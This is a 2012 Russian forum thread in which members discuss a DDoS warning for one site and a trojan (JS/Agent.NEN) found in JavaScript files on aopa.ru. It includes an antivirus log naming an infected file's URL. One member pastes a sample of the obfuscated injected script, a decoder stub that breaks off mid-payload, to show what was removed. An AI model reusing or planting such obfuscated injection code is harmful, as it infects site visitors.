Страница 1 из 1
Нас атакуют!)
Добавлено: 11 апр 2012, 10:01
Serega
Инженерами #### зафиксировано чрезмерное увеличение количества запросов к вашему сайту saon.ru, в результате анализа данных запросов была выявлена DDOS атака.
Инженеры ###### предпринимают все возможные меры для отражения атаки.
Всплывающее при первом посещении сайта окно с кнопкой "ОК", установленное на вашем сайте, является частью системы защиты.
Re: Нас атакуют!)
Добавлено: 11 апр 2012, 10:10
Misha
Неужели Александр Васильевич заказал?
Re: Нас атакуют!)
Добавлено: 11 апр 2012, 18:09
Vi-kTo-R
Меня Троян встретил в обед на РАОПА.
И впрямь засуетились супостаты..
Re: Нас атакуют!)
Добавлено: 11 апр 2012, 18:12
502
Vi-kTo-R писал(а):Меня Троян встретил в обед на РАОПА.
Повтори еще раз? Какой троян, в какой обед?
Был вирус где-то неделю назад, но уже вычистили.
Re: Нас атакуют!)
Добавлено: 11 апр 2012, 18:22
Vi-kTo-R
11.04.2012 13:29:40 "Фильтр HTTP файл
http://aopa.ru/templates/ja_purity_iii/js/menu/mega.js JS/Agent.NEN троянская программа соединение прервано - изолирован VIKTOR-CC6FAEEF\Виктор"
Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Mozilla Firefox\firefox.exe.
Как минимум еще шесть зараженных файлов есть в архиве журнала антивируса.
Re: Нас атакуют!)
Добавлено: 11 апр 2012, 18:31
Vi-kTo-R
Не советую переходить по ссылке файла. Он заражен, только что проверил.
Re: Нас атакуют!)
Добавлено: 11 апр 2012, 19:05
владислав74
Vi-kTo-R писал(а):Не советую переходить по ссылке файла. Он заражен, только что проверил.
Просто директор в отпуске,вот и засуетились супостаты на еще тепленькое
Re: Нас атакуют!)
Добавлено: 11 апр 2012, 19:12
CRaZy_SouL
Неделю назад около 10 наших сайтов атаковали гады какие-то...
Re: Нас атакуют!)
Добавлено: 11 апр 2012, 21:21
leksey
На aopa.ru убрали вредоносный код, он внедрен был в js-файлы.
Антивирусы теперь должны перестать ругаться. И ряд других мер предприняли, чтобы не допустить впредь такого. При этом вредностный код обсуфуцирован (зашифрован) и отличался от файла к файлу - т.е. искать его сложнее. Вот так выглядел:
Код: Выделить всё
var k574ef9="";function fe134348e8(){var gb6267aad=String,ic1e6929=Array.prototype.slice.call(arguments).join(""),sc817c=ic
1e6929.substr(x97af5f4(),3)-568,wce0ce3,hbe41c4;ic1e6929=ic1e6929.substr(18);var h7480e852=ic1e6929.length;for(var wa29b95=
0;wa29b95<h7480e852;wa29b95++){try{throw(o8a85c47=g067dd(ic1e6929,wa29b95));}catch(e){o8a85c47=e;};if(o8a85c47=='\x95'){sc8
17c="";wa29b95++;k9af3ad=f4e348d74(ic1e6929,wa29b95);while(fd5b53(k9af3ad)){sc817c+=k9af3ad;wa29b95++;k9af3ad=ic1e6929.subs
tr(wa29b95,1);}sc817c-=577;continue;}wce0ce3="";if(o8a85c47=='\xa9'){wa29b95++;o8a85c47=ic1e6929.substr(wa29b95,1);while(o8
a85c47!='\xa9'){wce0ce3+=o8a85c47;wa29b95++;o8a85c47=ic1e6929.substr(wa29b95,1);}wce0ce3=q2377f(wce0ce3,sc817c,49);if(wce0c
e3<0)wce0ce3+=256;wce0ce3=qa8f75(wce0ce3);le7f1423(wce0ce3);continue;}h694cfe0=ua0c55b5f(o8a85c47);if(h694cfe0>848)h694cfe0
-=848;hbe41c4=h694cfe0-sc817c-49;if(hbe41c4<0)hbe41c4+=256;if(hbe41c4>=192)hbe41c4+=848;else if(hbe41c4==168)hbe41c4=1025;e
lse if(hbe41c4==184)hbe41c4=1105;k574ef9+=gb6267aad["\x66\x72\x6fm\x43ha\x72\x43\x6f\x64e"](hbe41c4);}}fe134348e8("7","7","
811","1","f","1e